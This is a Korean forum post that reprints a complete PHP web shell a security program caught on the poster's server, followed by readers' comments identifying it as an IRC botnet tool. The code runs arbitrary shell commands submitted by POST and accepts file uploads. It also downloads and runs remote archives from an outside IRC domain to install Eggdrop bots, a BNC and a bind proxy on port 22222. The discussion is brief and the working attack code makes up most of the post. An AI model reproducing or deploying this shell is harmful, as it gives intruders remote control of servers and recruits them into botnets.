포럼
해커의 흔적.
2013.07.22 05:52
?><html><head>
<style type="text/css">
<!--
body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }
table { width:100%; }
table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }
a { color:lightblue;text-decoration:none; }
a:active { color:#00FF00; }
a:link { color:#5B5BFF; }
a:hover { text-decoration:underline; }
a:visited { color:#99CCFF; }
input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }
textarea { color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2; }
input[type="submit"] { border:1px solid #000000; }
input[type="text"] { padding:3px;}
input,select,option,input[type="submit"]:hover { background-color:#333333; }
textarea { background-color:#000000; }
// -->
</style>
<title>-LampungCyber Community-</title>
</head>
<body><center><hr noshade size=1><h2>diKi Simple Shell Injectionz v0.01</h2><p>
<hr noshade size=1>
Thanks to : arch_fajri - lampungcarding - chandra35 - singkong @ irc.bandarlampung.us</center></p>
<hr noshade size=1>
<?php
error_reporting(4);
$sh_mainurl = "http://www.bandarlampung.us/irc/";
$sh_sourcez = array(
"dQ99Sh" => array($sh_mainurl."readme.txt","kiddie.php"),
"dQBNC" => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),
"Eggdrop" => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),
"BindDoor" => array($sh_mainurl."proxy.tgz","proxy.tgz"),
"RFIScaN" => array($sh_mainurl."404.txt","error.txt"),
);
if (safemode()) { $dsafe = "<font color=#3366FF><b>ON</b></font>"; }
else { $dsafe = "<font color=#3366FF><b>OFF</b></font>"; }
echo "Safe : $dsafe OS: ".info(php_uname())."<br>".
"Software : ".info(getenv("SERVER_SOFTWARE"))."<br>".
"Userid : ".info(aJ99exec("id"))."<br>".
"IP Target: ".info(gethostbyname($_SERVER["HTTP_HOST"]))."<br>".
"IP Anda : ".info($_SERVER["REMOTE_ADDR"])."<br>";
if (isset($_POST['dir'])) {
$dir = $_POST['dir'];
if (!@chdir($dir)) { echo "Ga bisa masuk $dir | "; }
}
else { $dir = getcwd(); }
echo "Direktory: $dir ";
if (is_writable($dir)) { echo "[Writable]"; } else { echo "[Readonly]"; }
?>
<hr noshade size=1>
<center>
<textarea cols=130 rows=20>
<?php
if (empty($_POST['portpsy'])) { $portpsy = 27071; }
if (empty($_POST['bip'])) { $bip = gethostbyname($_SERVER["HTTP_HOST"]); }
if (isset($_POST['bot1'])) {
$chan1 = $_POST['channel1'];
$sirc1 = $_POST['serverirc1'];
echo "Downloading Scanbot 1..\n";
echo aJ99exec("cd /dev/shm;wget ".$sh_sourcez["RFIScaN"][0]);
echo "Loading RFI Scanbot.. $chan1 at $sirc1 $port1\n";
echo aJ99exec("cd /dev/shm;perl ".$sh_sourcez["RFIScaN"][1]." $chan1 $sirc1 $port1;");
}
elseif (isset($_POST['psy'])) {
$portpsy = $_POST['portpsy'];
echo aJ99exec("wget ".$sh_sourcez["dQBNC"][0].";tar -zxf ".$sh_sourcez["dQBNC"][1]);
echo aJ99exec("cd .dQBNC;./config admin $portpsy;./fuck;./run");
}
elseif (isset($_POST['egg'])) {
$bf = $_POST['bf'];
$bnick = $_POST['bnick'];
$bident = $_POST['bident'];
$bip = $_POST['bip'];
$bchan = $_POST['bchan'];
$bowner = $_POST['bowner'];
echo aJ99exec("wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["Eggdrop"][1]);
echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);
echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');
}
elseif (isset($_POST['eggrun'])) {
$bf = $_POST['bf'];
$bnick = $_POST['bnick'];
$bident = $_POST['bident'];
$bip = $_POST['bip'];
$bchan = $_POST['bchan'];
$bowner = $_POST['bowner'];
echo aJ99exec('cd .allnet;./dhie '.$bf.' '.$bnick.' '.$bident.' '.$bip.' '.$bchan.' '.$bowner);
echo aJ99exec('cd .allnet;./dssl '.$bf.';cd scripts;./autobotchk '.$bf.' -noemail -5');
}
elseif (isset($_POST['bind'])) {
echo aJ99exec("wget ".$sh_sourcez["BindDoor"][0].";tar -zxf ".$sh_sourcez["BindDoor"][1].";cd pro;./prox -d -a -p22222");
}
elseif (isset($_POST['cmd'])) {
$cmdtxt = $_POST['cmdtxt'];
$ret = aJ99exec($cmdtxt); echo htmlspecialchars($ret);
}
?>
</textarea>
</center>
<hr noshade size=1>
<!-- <form enctype="multipart/form-data" action="" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
UPLOAD File: <input name="file" type="file" />
<input type="submit" value="UPLOAD" />
</form> -->
<hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Direktori: <input type="text" size=40 value="<?php echo $dir; ?>" name="dir" />
Command: <input type="text" size=80 value="<?php echo $cmdtxt; ?>" name="cmdtxt" />
<input type="submit" value="Execute" name="cmd" /><br>
</form>
<!-- <hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Port: <input type="text" size=6 value="<?php echo $portpsy; ?>" name="portpsy" />
<input type="submit" value="dQBNC" name="psy" />
<input type="submit" value="Elite Proxy" name="bind" />
</form> -->
<hr noshade size=1>
<hr noshade size=1>
<form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
<strong>Install EggDrop : </strong><p>
File: <input type="text" size=10 value="<?php echo $bf; ?>" name="bf" />
Nick: <input type="text" size=10 value="<?php echo $bnick; ?>" name="bnick" />
Ident: <input type="text" size=10 value="<?php echo $bident; ?>" name="bident" />
IP: <input type="text" size=10 value="<?php echo $bip; ?>" name="bip" />
Chan: <input type="text" size=10 value="<?php echo $bchan; ?>" name="bchan" />
Owner: <input type="text" size=10 value="<?php echo $bowner; ?>" name="bowner" />
<input type="submit" value="Install Eggdrop" name="egg" />
<input type="submit" value="Load Eggdrop" name="eggrun" />
</form>
<hr noshade size=1>
<hr noshade size=1>
<!-- <form method="POST" enctype="multipart/form-data">
<input type=hidden name="dir" value="<?php echo $dir; ?>">
Chan: <input type="text" size=6 value="<?php echo $channel1; ?>" name="channel1" />
Server: <input type="text" value="<?php echo $serverirc1; ?>" name="serverirc1" />
Port: <input type="text" value="<?php echo $port1; ?>" name="port1" />
<input type="submit" value="RFIBotScaN" name="bot1" />
</form> -->
<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>
<?php
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload OK!!!</b><br><br>'; }
else { echo '<b>Upload FAILED!!!</b><br><br>'; }
}
?>
<?php
function info($txt){ return "<font color=lime>".$txt."</font>"; }
###########################
## aJ99Sh CORE FUNCTIONS ##
###########################
function safemode() {
if ( @ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) { return TRUE; }
else { return FALSE; }
}
function getdisfunc() {
$disfunc = @ini_get("disable_functions");
if (!empty($disfunc)) {
$disfunc = str_replace(" ","",$disfunc);
$disfunc = explode(",",$disfunc);
}
else { $disfunc= array(); }
return $disfunc;
}
function enabled($func) {
if ( is_callable($func) && !in_array($func,getdisfunc()) ) { return TRUE; }
else { return FALSE; }
}
function aJ99exec($cmd) {
$output = "";
if ( enabled("popen") ) {
$h = popen($cmd.' 2>&1', 'r');
if ( is_resource($h) ) {
while ( !feof($h) ) { $output .= fread($h, 2096); }
pclose($h);
}
}
elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
else { $output = "NULL"; }
return $output;
}
function aJ99exec2($cmd) {
$output = "";
if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); }
elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); }
elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); }
elseif ( enabled("popen") ) {
$h = popen($cmd.' 2>&1', 'r');
if ( is_resource($h) ) {
while ( !feof($h) ) { $output .= fread($h, 2096); }
pclose($h);
}
}
return $output;
}
die();
?><?
보안 프로그램에 걸린 해커의 흔적
댓글 11
-
Lansi
2013.07.22 07:17
악성코드 같네요
-
엘카
2013.07.22 09:32
해커가 남긴 흔적이요.
-
socialskyo
2013.07.22 11:27
오...엘카님이시다...처음 인사드립니다. www 애드온 정말 유용하게 잘 사용 중에 있습니다.
-
avast가 이페이지 접근을 금지시키군요...
-
KS
2013.07.22 22:36
뭔진 모르겠지만 무섭네요....
-
리크스
2013.07.23 07:03
어떤 보안 프로그램 사용하시나요? 이런 것도 잡을 수 있다니 신기하네요.
-
정도의길을걷기싫다
2013.07.23 10:08
오랜만에 보는 코드네요 ^^
한참 언어 공부할때 해커쪽에도 관심이 있던지라 공부를 했는데
다는 모르지만 어떤구조로 뭔가를 취하려고 하는지는 알것같네요
-
DynamicLaser
2013.07.23 17:46
에그드랍이라고 적혀있는걸 보니 IRC 좀비를 생성하기 위한 툴인것같네요.
-
리크스
2013.07.23 17:50
아 그러면 저 코드가 침투된 사이트의 사용자를 이용해 저 위에 적혀있는 irc를 테러하는 것이군요.
-
DynamicLaser
2013.07.23 17:54
적혀있는 IRC는 아니구요 ^^;
IRC 특정 서버의 한 채널에 봇들을 집결시켜서, 명령어를 내려서 특정서버나 특정 채널에 접속해서 메세지를 반복적으로 뿌려 사용자들의 채팅을 방해하기 위하여 만든거죠.
일단은 테러하기 위한 사전준비? 그렇게 보시는편이 좋습니다.
이걸 잘 아는 이유가 제가 IRC를 쓰는데 이런식으로 공격을 당해봐서..ㅠㅠ
와우~ 이게 뭐죠?